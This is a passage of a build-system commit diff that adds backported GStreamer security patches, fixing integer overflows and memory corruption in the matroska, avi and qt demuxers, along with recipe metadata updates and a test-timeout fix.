165- GST_WRITE_UINT32_LE (outdata + outpos + 12, wvh.block_index);
166- GST_WRITE_UINT32_LE (outdata + outpos + 16, block_samples);
167- GST_WRITE_UINT32_LE (outdata + outpos + 20, flags);
168- GST_WRITE_UINT32_LE (outdata + outpos + 24, crc);
169- outpos += 28;
170-
171- memmove (outdata + outpos, data, blocksize);
172- outpos += blocksize;
173 data += blocksize;
174 size -= blocksize;
175 }
176 gst_buffer_unmap (*buf, &map);
177- gst_buffer_unref (*buf);
178
179- if (newbuf)
180- gst_buffer_unmap (newbuf, &outmap);
181+ newbuf = gst_adapter_take_buffer (adapter, gst_adapter_available (adapter));
182+ g_object_unref (adapter);
183
184+ gst_buffer_copy_into (newbuf, *buf,
185+ GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
186+ gst_buffer_unref (*buf);
187 *buf = newbuf;
188+
189 audiocontext->wvpk_block_index += block_samples;
190 }
191
192diff --git a/gst/matroska/matroska-ids.h b/gst/matroska/matroska-ids.h
193index 429213f77..8d4a685a9 100644
194--- a/gst/matroska/matroska-ids.h
195+++ b/gst/matroska/matroska-ids.h
196@@ -688,6 +688,8 @@ typedef struct _Wavpack4Header {
197 guint32 crc; /* crc for actual decoded data */
198 } Wavpack4Header;
199
200+#define WAVPACK4_HEADER_SIZE (32)
201+
202 typedef enum {
203 GST_MATROSKA_TRACK_ENCODING_SCOPE_FRAME = (1<<0),
204 GST_MATROSKA_TRACK_ENCODING_SCOPE_CODEC_DATA = (1<<1),
205--
206GitLab
207
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
new file mode 100644
index 0000000000..d3de2d5014
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
@@ -0,0 +1,44 @@
1From 02174790726dd20a5c73ce2002189bf240ad4fe0 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
3Date: Wed, 3 Mar 2021 11:31:52 +0200
4Subject: [PATCH] matroskademux: Initialize track context out parameter to NULL
5 before parsing
6
7Various error return paths don't set it to NULL and callers are only
8checking if the pointer is NULL. As it's allocated on the stack this
9usually contains random stack memory, and more often than not the memory
10of a previously parsed track.
11
12This then causes all kinds of memory corruptions further down the line.
13
14Thanks to Natalie Silvanovich for reporting.
15
16Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/858
17
18Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
19
20Upstream-Status: Backport [
21https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/02174790726dd20a5c73ce2002189bf240ad4fe0?merge_request_iid=903 ]
22CVE: CVE-2021-3498
23Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
24
25---
26 gst/matroska/matroska-demux.c | 2 ++
27 1 file changed, 2 insertions(+)
28
29diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
30index 4d0234743..467815986 100644
31--- a/gst/matroska/matroska-demux.c
32+++ b/gst/matroska/matroska-demux.c
33@@ -692,6 +692,8 @@ gst_matroska_demux_parse_stream (GstMatroskaDemux * demux, GstEbmlRead * ebml,
34
35 DEBUG_ELEMENT_START (demux, ebml, "TrackEntry");
36
37+ *dest_context = NULL;
38+
39 /* start with the master */
40 if ((ret = gst_ebml_read_master (ebml, &id)) != GST_FLOW_OK) {
41 DEBUG_ELEMENT_STOP (demux, ebml, "TrackEntry", ret);
42--
43GitLab
44
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
new file mode 100644
index 0000000000..ee33c5564d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
@@ -0,0 +1,59 @@
1From cf887f1b8e228bff6e19829e6d03995d70ad739d Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
3Date: Wed, 18 May 2022 10:23:15 +0300
4Subject: [PATCH] matroskademux: Avoid integer-overflow resulting in heap
5 corruption in WavPack header handling code
6
7blocksize + WAVPACK4_HEADER_SIZE might overflow gsize, which then
8results in allocating a very small buffer. Into that buffer blocksize
9data is memcpy'd later which then causes out of bound writes and can
10potentially lead to anything from crashes to remote code execution.
11
12Thanks to Adam Doupe for analyzing and reporting the issue.
13
14CVE: CVE-2022-1920
15
16https://gstreamer.freedesktop.org/security/sa-2022-0004.html
17
18Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1226
19
20Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2612>
21
22https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/0df0dd7fe388174e4835eda4526b47f470a56370
23Upstream-Status: Backport
24Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
25---
26 .../gst/matroska/matroska-demux.c | 10 +++++++++-
27 1 file changed, 9 insertions(+), 1 deletion(-)
28
29diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
30index 64cc6be60be..01d754c3eb9 100644
31--- a/gst/matroska/matroska-demux.c
32+++ b/gst/matroska/matroska-demux.c
33@@ -3933,7 +3933,8 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
34 } else {
35 guint8 *outdata = NULL;
36 gsize buf_size, size;
37- guint32 block_samples, flags, crc, blocksize;
38+ guint32 block_samples, flags, crc;
39+ gsize blocksize;
40 GstAdapter *adapter;
41
42 adapter = gst_adapter_new ();
43@@ -3974,6 +3975,13 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
44 return GST_FLOW_ERROR;
45 }
46
47+ if (blocksize > G_MAXSIZE - WAVPACK4_HEADER_SIZE) {
48+ GST_ERROR_OBJECT (element, "Too big wavpack buffer");
49+ gst_buffer_unmap (*buf, &map);
50+ g_object_unref (adapter);
51+ return GST_FLOW_ERROR;
52+ }
53+
54 g_assert (newbuf == NULL);
55
56 newbuf =
57--
58GitLab
59
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
new file mode 100644
index 0000000000..99dbb2b1b0
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
@@ -0,0 +1,69 @@
1From f503caad676971933dc0b52c4b313e5ef0d6dbb0 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
3Date: Wed, 18 May 2022 12:00:48 +0300
4Subject: [PATCH] avidemux: Fix integer overflow resulting in heap corruption
5 in DIB buffer inversion code
6
7Check that width*bpp/8 doesn't overflow a guint and also that
8height*stride fits into the provided buffer without overflowing.
9
10Thanks to Adam Doupe for analyzing and reporting the issue.
11
12CVE: CVE-2022-1921
13
14See https://gstreamer.freedesktop.org/security/sa-2022-0001.html
15
16Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1224
17
18Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2608>
19
20https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/f503caad676971933dc0b52c4b313e5ef0d6dbb0
21Upstream-Status: Backport
22Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
23---
24 .../gst/avi/gstavidemux.c | 17 ++++++++++++++---
25 1 file changed, 14 insertions(+), 3 deletions(-)
26
27diff --git a/gst/avi/gstavidemux.c b/gst/avi/gstavidemux.c
28index eafe865494c..0d18a6495c7 100644
29--- a/gst/avi/gstavidemux.c
30+++ b/gst/avi/gstavidemux.c
31@@ -4973,8 +4973,8 @@ swap_line (guint8 * d1, guint8 * d2, guint8 * tmp, gint bytes)
32 static GstBuffer *
33 gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
34 {
35- gint y, w, h;
36- gint bpp, stride;
37+ guint y, w, h;
38+ guint bpp, stride;
39 guint8 *tmp = NULL;
40 GstMapInfo map;
41 guint32 fourcc;
42@@ -5001,12 +5001,23 @@ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
43 h = stream->strf.vids->height;
44 w = stream->strf.vids->width;
45 bpp = stream->strf.vids->bit_cnt ? stream->strf.vids->bit_cnt : 8;
46+
47+ if ((guint64) w * ((guint64) bpp / 8) > G_MAXUINT - 4) {
48+ GST_WARNING ("Width x stride overflows");
49+ return buf;
50+ }
51+
52+ if (w == 0 || h == 0) {
53+ GST_WARNING ("Zero width or height");
54+ return buf;
55+ }
56+
57 stride = GST_ROUND_UP_4 (w * (bpp / 8));
58
59 buf = gst_buffer_make_writable (buf);
60
61 gst_buffer_map (buf, &map, GST_MAP_READWRITE);
62- if (map.size < (stride * h)) {
63+ if (map.size < ((guint64) stride * (guint64) h)) {
64 GST_WARNING ("Buffer is smaller than reported Width x Height x Depth");
65 gst_buffer_unmap (buf, &map);
66 return buf;
67--
68GitLab
69
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
new file mode 100644
index 0000000000..ebffbc473d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
@@ -0,0 +1,214 @@
1From ad6012159acf18c6b5c0f4edf037e8c9a2dbc966 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
3Date: Wed, 18 May 2022 11:24:37 +0300
4Subject: [PATCH] matroskademux: Fix integer overflows in zlib/bz2/etc
5 decompression code
6
7Various variables were of smaller types than needed and there were no
8checks for any overflows when doing additions on the sizes. This is all
9checked now.
10
11In addition the size of the decompressed data is limited to 120MB now as
12any larger sizes are likely pathological and we can avoid out of memory
13situations in many cases like this.
14
15Also fix a bug where the available output size on the next iteration in
16the zlib/bz2 decompression code was provided too large and could
17potentially lead to out of bound writes.
18
19Thanks to Adam Doupe for analyzing and reporting the issue.
20
21CVE: CVE-2022-1922, CVE-2022-1923, CVE-2022-1924, CVE-2022-1925
22
23https://gstreamer.freedesktop.org/security/sa-2022-0002.html
24
25Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
26
27Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
28
29CVE: CVE-2022-1922 CVE-2022-1923 CVE-2022-1924 CVE-2022-1925
30https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/ad6012159acf18c6b5c0f4edf037e8c9a2dbc966
31Upstream-Status: Backport
32Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
33---
34 .../gst/matroska/matroska-read-common.c | 76 +++++++++++++++----
35 1 file changed, 61 insertions(+), 15 deletions(-)
36
37diff --git a/gst/matroska/matroska-read-common.c b/gst/matroska/matroska-read-common.c
38index eb317644cc5..6fadbba9567 100644
39--- a/gst/matroska/matroska-read-common.c
40+++ b/gst/matroska/matroska-read-common.c
41@@ -70,6 +70,10 @@ typedef struct
42 gboolean audio_only;
43 } TargetTypeContext;
44
45+/* 120MB as maximum decompressed data size. Anything bigger is likely
46+ * pathological, and like this we avoid out of memory situations in many cases
47+ */
48+#define MAX_DECOMPRESS_SIZE (120 * 1024 * 1024)
49
50 static gboolean
51 gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
52@@ -77,19 +81,23 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
53 GstMatroskaTrackCompressionAlgorithm algo)
54 {
55 guint8 *new_data = NULL;
56- guint new_size = 0;
57+ gsize new_size = 0;
58 guint8 *data = *data_out;
59- guint size = *size_out;
60+ const gsize size = *size_out;
61 gboolean ret = TRUE;
62
63+ if (size > G_MAXUINT32) {
64+ GST_WARNING ("too large compressed data buffer.");
65+ ret = FALSE;
66+ goto out;
67+ }
68+
69 if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_ZLIB) {
70 #ifdef HAVE_ZLIB
71 /* zlib encoded data */
72 z_stream zstream;
73- guint orig_size;
74 int result;
75
76- orig_size = size;
77 zstream.zalloc = (alloc_func) 0;
78 zstream.zfree = (free_func) 0;
79 zstream.opaque = (voidpf) 0;
80@@ -99,8 +107,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
81 goto out;
82 }
83 zstream.next_in = (Bytef *) data;
84- zstream.avail_in = orig_size;
85- new_size = orig_size;
86+ zstream.avail_in = size;
87+ new_size = size;
88 new_data = g_malloc (new_size);
89 zstream.avail_out = new_size;
90 zstream.next_out = (Bytef *) new_data;
91@@ -114,10 +122,18 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
92 break;
93 }
94
95+ if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
96+ GST_WARNING ("too big decompressed data");
97+ result = Z_MEM_ERROR;
98+ break;
99+ }
100+
101 new_size += 4096;
102 new_data = g_realloc (new_data, new_size);
103 zstream.next_out = (Bytef *) (new_data + zstream.total_out);
104- zstream.avail_out += 4096;
105+ /* avail_out is an unsigned int */
106+ g_assert (new_size - zstream.total_out <= G_MAXUINT);
107+ zstream.avail_out = new_size - zstream.total_out;
108 } while (zstream.avail_in > 0);
109
110 if (result != Z_STREAM_END) {
111@@ -137,13 +153,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
112 #ifdef HAVE_BZ2
113 /* bzip2 encoded data */
114 bz_stream bzstream;
115- guint orig_size;
116 int result;
117
118 bzstream.bzalloc = NULL;
119 bzstream.bzfree = NULL;
120 bzstream.opaque = NULL;
121- orig_size = size;
122
123 if (BZ2_bzDecompressInit (&bzstream, 0, 0) != BZ_OK) {
124 GST_WARNING ("bzip2 initialization failed.");
125@@ -152,8 +166,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
126 }
127
128 bzstream.next_in = (char *) data;
129- bzstream.avail_in = orig_size;
130- new_size = orig_size;
131+ bzstream.avail_in = size;
132+ new_size = size;
133 new_data = g_malloc (new_size);
134 bzstream.avail_out = new_size;
135 bzstream.next_out = (char *) new_data;
136@@ -167,17 +181,31 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
137 break;
138 }
139
140+ if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
141+ GST_WARNING ("too big decompressed data");
142+ result = BZ_MEM_ERROR;
143+ break;
144+ }
145+
146 new_size += 4096;
147 new_data = g_realloc (new_data, new_size);
148- bzstream.next_out = (char *) (new_data + bzstream.total_out_lo32);
149- bzstream.avail_out += 4096;
150+ bzstream.next_out =
151+ (char *) (new_data + ((guint64) bzstream.total_out_hi32 << 32) +
152+ bzstream.total_out_lo32);
153+ /* avail_out is an unsigned int */
154+ g_assert (new_size - ((guint64) bzstream.total_out_hi32 << 32) +
155+ bzstream.total_out_lo32 <= G_MAXUINT);
156+ bzstream.avail_out =
157+ new_size - ((guint64) bzstream.total_out_hi32 << 32) +
158+ bzstream.total_out_lo32;
159 } while (bzstream.avail_in > 0);
160
161 if (result != BZ_STREAM_END) {
162 ret = FALSE;
163 g_free (new_data);
164 } else {
165- new_size = bzstream.total_out_lo32;
166+ new_size =
167+ ((guint64) bzstream.total_out_hi32 << 32) + bzstream.total_out_lo32;
168 }
169 BZ2_bzDecompressEnd (&bzstream);
170
171@@ -189,7 +217,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
172 } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_LZO1X) {
173 /* lzo encoded data */
174 int result;
175- int orig_size, out_size;
176+ gint orig_size, out_size;
177+
178+ if (size > G_MAXINT) {
179+ GST_WARNING ("too large compressed data buffer.");
180+ ret = FALSE;
181+ goto out;
182+ }
183
184 orig_size = size;
185 out_size = size;
186@@ -203,6 +237,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
187 result = lzo1x_decode (new_data, &out_size, data, &orig_size);
188
189 if (orig_size > 0) {
190+ if (new_size > G_MAXINT - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
191+ GST_WARNING ("too big decompressed data");
192+ result = LZO_ERROR;
193+ break;
194+ }
195 new_size += 4096;
196 new_data = g_realloc (new_data, new_size);
197 }
198@@ -221,6 +260,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
199 } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_HEADERSTRIP) {
200 /* header stripped encoded data */
201 if (enc->comp_settings_length > 0) {
202+ if (size > G_MAXSIZE - enc->comp_settings_length
203+ || size + enc->comp_settings_length > MAX_DECOMPRESS_SIZE) {
204+ GST_WARNING ("too big decompressed data");
205+ ret = FALSE;
206+ goto out;
207+ }
208+
209 new_data = g_malloc (size + enc->comp_settings_length);
210 new_size = size + enc->comp_settings_length;
211
212--
213GitLab
214
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
new file mode 100644
index 0000000000..f4d38c270e
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
@@ -0,0 +1,60 @@
1From 14d306da6da51a762c4dc701d161bb52ab66d774 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
3Date: Mon, 30 May 2022 10:15:37 +0300
4Subject: [PATCH] qtdemux: Fix integer overflows in zlib decompression code
5
6Various variables were of smaller types than needed and there were no
7checks for any overflows when doing additions on the sizes. This is all
8checked now.
9
10In addition the size of the decompressed data is limited to 200MB now as
11any larger sizes are likely pathological and we can avoid out of memory
12situations in many cases like this.
13
14Also fix a bug where the available output size on the next iteration in
15the zlib decompression code was provided too large and could
16potentially lead to out of bound writes.
17
18Thanks to Adam Doupe for analyzing and reporting the issue.
19
20CVE: tbd
21
22https://gstreamer.freedesktop.org/security/sa-2022-0003.html
23
24Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
25
26Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
27
28https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/14d306da6da51a762c4dc701d161bb52ab66d774
29CVE: CVE-2022-2122
30Upstream-Status: Backport
31Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
32---
33 gst/isomp4/qtdemux.c | 8 +++++++-
34 1 file changed, 7 insertions(+), 1 deletion(-)
35
36diff --git a/gst/isomp4/qtdemux.c b/gst/isomp4/qtdemux.c
37index 7cc346b1e63..97ba0799a8d 100644
38--- a/gst/isomp4/qtdemux.c
39+++ b/gst/isomp4/qtdemux.c
40@@ -7905,10 +7905,16 @@ qtdemux_inflate (void *z_buffer, guint z_length, guint * length)
41 break;
42 }
43
44+ if (*length > G_MAXUINT - 4096 || *length > QTDEMUX_MAX_SAMPLE_INDEX_SIZE) {
45+ GST_WARNING ("too big decompressed data");
46+ ret = Z_MEM_ERROR;
47+ break;
48+ }
49+
50 *length += 4096;
51 buffer = (guint8 *) g_realloc (buffer, *length);
52 z.next_out = (Bytef *) (buffer + z.total_out);
53- z.avail_out += 4096;
54+ z.avail_out += *length - z.total_out;
55 } while (z.avail_in > 0);
56
57 if (ret != Z_STREAM_END) {
58--
59GitLab
60
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
index 75dd029109..831a317a82 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
@@ -1,9 +1,19 @@
1require gstreamer1.0-plugins-common.inc 1require gstreamer1.0-plugins-common.inc
2 2
3DESCRIPTION = "'Good' GStreamer plugins"
4HOMEPAGE = "https://gstreamer.freedesktop.org/"
5BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues"
6
3SRC_URI = " \ 7SRC_URI = " \
4 https://gstreamer.freedesktop.org/src/gst-plugins-good/gst-plugins-good-${PV}.tar.xz \ 8 https://gstreamer.freedesktop.org/src/gst-plugins-good/gst-plugins-good-${PV}.tar.xz \
5 file://0001-qmlgl-ensure-Qt-defines-GLsync-to-fix-compile-on-som.patch \ 9 file://0001-qmlgl-ensure-Qt-defines-GLsync-to-fix-compile-on-som.patch \
6 file://0001-qt-include-ext-qt-gstqtgl.h-instead-of-gst-gl-gstglf.patch \ 10 file://0001-qt-include-ext-qt-gstqtgl.h-instead-of-gst-gl-gstglf.patch \
11 file://CVE-2021-3497.patch \
12 file://CVE-2021-3498.patch \
13 file://CVE-2022-1920.patch \
14 file://CVE-2022-1921.patch \
15 file://CVE-2022-1922-1923-1924-1925.patch \
16 file://CVE-2022-2122.patch \
7 " 17 "
8 18
9SRC_URI[md5sum] = "c79b6c2f8eaadb2bb66615b694db399e" 19SRC_URI[md5sum] = "c79b6c2f8eaadb2bb66615b694db399e"
@@ -30,6 +40,8 @@ X11DEPENDS = "virtual/libx11 libsm libxrender libxfixes libxdamage"
30X11ENABLEOPTS = "-Dximagesrc=enabled -Dximagesrc-xshm=enabled -Dximagesrc-xfixes=enabled -Dximagesrc-xdamage=enabled" 40X11ENABLEOPTS = "-Dximagesrc=enabled -Dximagesrc-xshm=enabled -Dximagesrc-xfixes=enabled -Dximagesrc-xdamage=enabled"
31X11DISABLEOPTS = "-Dximagesrc=disabled -Dximagesrc-xshm=disabled -Dximagesrc-xfixes=disabled -Dximagesrc-xdamage=disabled" 41X11DISABLEOPTS = "-Dximagesrc=disabled -Dximagesrc-xshm=disabled -Dximagesrc-xfixes=disabled -Dximagesrc-xdamage=disabled"
32 42
43QT5WAYLANDDEPENDS = "${@bb.utils.contains("DISTRO_FEATURES", "wayland", "qtwayland", "", d)}"
44
33PACKAGECONFIG[bz2] = "-Dbz2=enabled,-Dbz2=disabled,bzip2" 45PACKAGECONFIG[bz2] = "-Dbz2=enabled,-Dbz2=disabled,bzip2"
34PACKAGECONFIG[cairo] = "-Dcairo=enabled,-Dcairo=disabled,cairo" 46PACKAGECONFIG[cairo] = "-Dcairo=enabled,-Dcairo=disabled,cairo"
35PACKAGECONFIG[dv1394] = "-Ddv1394=enabled,-Ddv1394=disabled,libiec61883 libavc1394 libraw1394" 47PACKAGECONFIG[dv1394] = "-Ddv1394=enabled,-Ddv1394=disabled,libiec61883 libavc1394 libraw1394"
@@ -44,7 +56,7 @@ PACKAGECONFIG[libpng] = "-Dpng=enabled,-Dpng=disabled,libpng"
44PACKAGECONFIG[libv4l2] = "-Dv4l2-libv4l2=enabled,-Dv4l2-libv4l2=disabled,v4l-utils" 56PACKAGECONFIG[libv4l2] = "-Dv4l2-libv4l2=enabled,-Dv4l2-libv4l2=disabled,v4l-utils"
45PACKAGECONFIG[mpg123] = "-Dmpg123=enabled,-Dmpg123=disabled,mpg123" 57PACKAGECONFIG[mpg123] = "-Dmpg123=enabled,-Dmpg123=disabled,mpg123"
46PACKAGECONFIG[pulseaudio] = "-Dpulse=enabled,-Dpulse=disabled,pulseaudio" 58PACKAGECONFIG[pulseaudio] = "-Dpulse=enabled,-Dpulse=disabled,pulseaudio"
47PACKAGECONFIG[qt5] = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native" 59PACKAGECONFIG[qt5] = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native ${QT5WAYLANDDEPENDS}"
48PACKAGECONFIG[soup] = "-Dsoup=enabled,-Dsoup=disabled,libsoup-2.4" 60PACKAGECONFIG[soup] = "-Dsoup=enabled,-Dsoup=disabled,libsoup-2.4"
49PACKAGECONFIG[speex] = "-Dspeex=enabled,-Dspeex=disabled,speex" 61PACKAGECONFIG[speex] = "-Dspeex=enabled,-Dspeex=disabled,speex"
50PACKAGECONFIG[taglib] = "-Dtaglib=enabled,-Dtaglib=disabled,taglib" 62PACKAGECONFIG[taglib] = "-Dtaglib=enabled,-Dtaglib=disabled,taglib"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
index d9ec82d887..afde9a013d 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
@@ -1,5 +1,9 @@
1require gstreamer1.0-plugins-common.inc 1require gstreamer1.0-plugins-common.inc
2 2
3DESCRIPTION = "'Ugly GStreamer plugins"
4HOMEPAGE = "https://gstreamer.freedesktop.org/"
5BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-ugly/-/issues"
6
3LIC_FILES_CHKSUM = "file://COPYING;md5=a6f89e2100d9b6cdffcea4f398e37343 \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=a6f89e2100d9b6cdffcea4f398e37343 \
4 file://tests/check/elements/xingmux.c;beginline=1;endline=21;md5=4c771b8af188724855cb99cadd390068" 8 file://tests/check/elements/xingmux.c;beginline=1;endline=21;md5=4c771b8af188724855cb99cadd390068"
5 9
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
index 14b34a2808..9c7f0e078c 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Python bindings for GStreamer 1.0" 1SUMMARY = "Python bindings for GStreamer 1.0"
2DESCRIPTION = "GStreamer Python binding overrides (complementing the bindings \
3provided by python-gi) "
2HOMEPAGE = "http://cgit.freedesktop.org/gstreamer/gst-python/" 4HOMEPAGE = "http://cgit.freedesktop.org/gstreamer/gst-python/"
3SECTION = "multimedia" 5SECTION = "multimedia"
4 6
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
index 9d9b1b8757..af9b2c5a97 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
@@ -1,4 +1,5 @@
1SUMMARY = "VA-API support to GStreamer" 1SUMMARY = "VA-API support to GStreamer"
2HOMEPAGE = "https://gstreamer.freedesktop.org/"
2DESCRIPTION = "gstreamer-vaapi consists of a collection of VA-API \ 3DESCRIPTION = "gstreamer-vaapi consists of a collection of VA-API \
3based plugins for GStreamer and helper libraries: `vaapidecode', \ 4based plugins for GStreamer and helper libraries: `vaapidecode', \
4`vaapiconvert', and `vaapisink'." 5`vaapiconvert', and `vaapisink'."
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
new file mode 100644
index 0000000000..e32f3c101f
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
@@ -0,0 +1,33 @@
1From 1db36347d05d88835519368442e9aa89c64091ad Mon Sep 17 00:00:00 2001
2From: Seungha Yang <seungha@centricular.com>
3Date: Tue, 15 Sep 2020 00:54:58 +0900
4Subject: [PATCH] tests: seek: Don't use too strict timeout for validation
5
6Expected segment-done message might not be seen within expected
7time if system is not powerful enough.
8
9Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/625>
10
11Upstream-Status: Backport [https://cgit.freedesktop.org/gstreamer/gstreamer/commit?id=f44312ae5d831438fcf8041162079c65321c588c]
12Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
13Signed-off-by: Jose Quaresma <quaresma.jose@gmail.com>
14---
15 tests/check/pipelines/seek.c | 2 +-
16 1 file changed, 1 insertion(+), 1 deletion(-)
17
18diff --git a/tests/check/pipelines/seek.c b/tests/check/pipelines/seek.c
19index 28bb8846d..5f7447bc5 100644
20--- a/tests/check/pipelines/seek.c
21+++ b/tests/check/pipelines/seek.c
22@@ -521,7 +521,7 @@ GST_START_TEST (test_loopback_2)
23
24 GST_INFO ("wait for segment done message");
25
26- msg = gst_bus_timed_pop_filtered (bus, (GstClockTime) 2 * GST_SECOND,
27+ msg = gst_bus_timed_pop_filtered (bus, GST_CLOCK_TIME_NONE,
28 GST_MESSAGE_SEGMENT_DONE | GST_MESSAGE_ERROR);
29 fail_unless (msg, "no message within the timed window");
30 fail_unless_equals_string (GST_MESSAGE_TYPE_NAME (msg), "segment-done");
31--
322.29.2
33
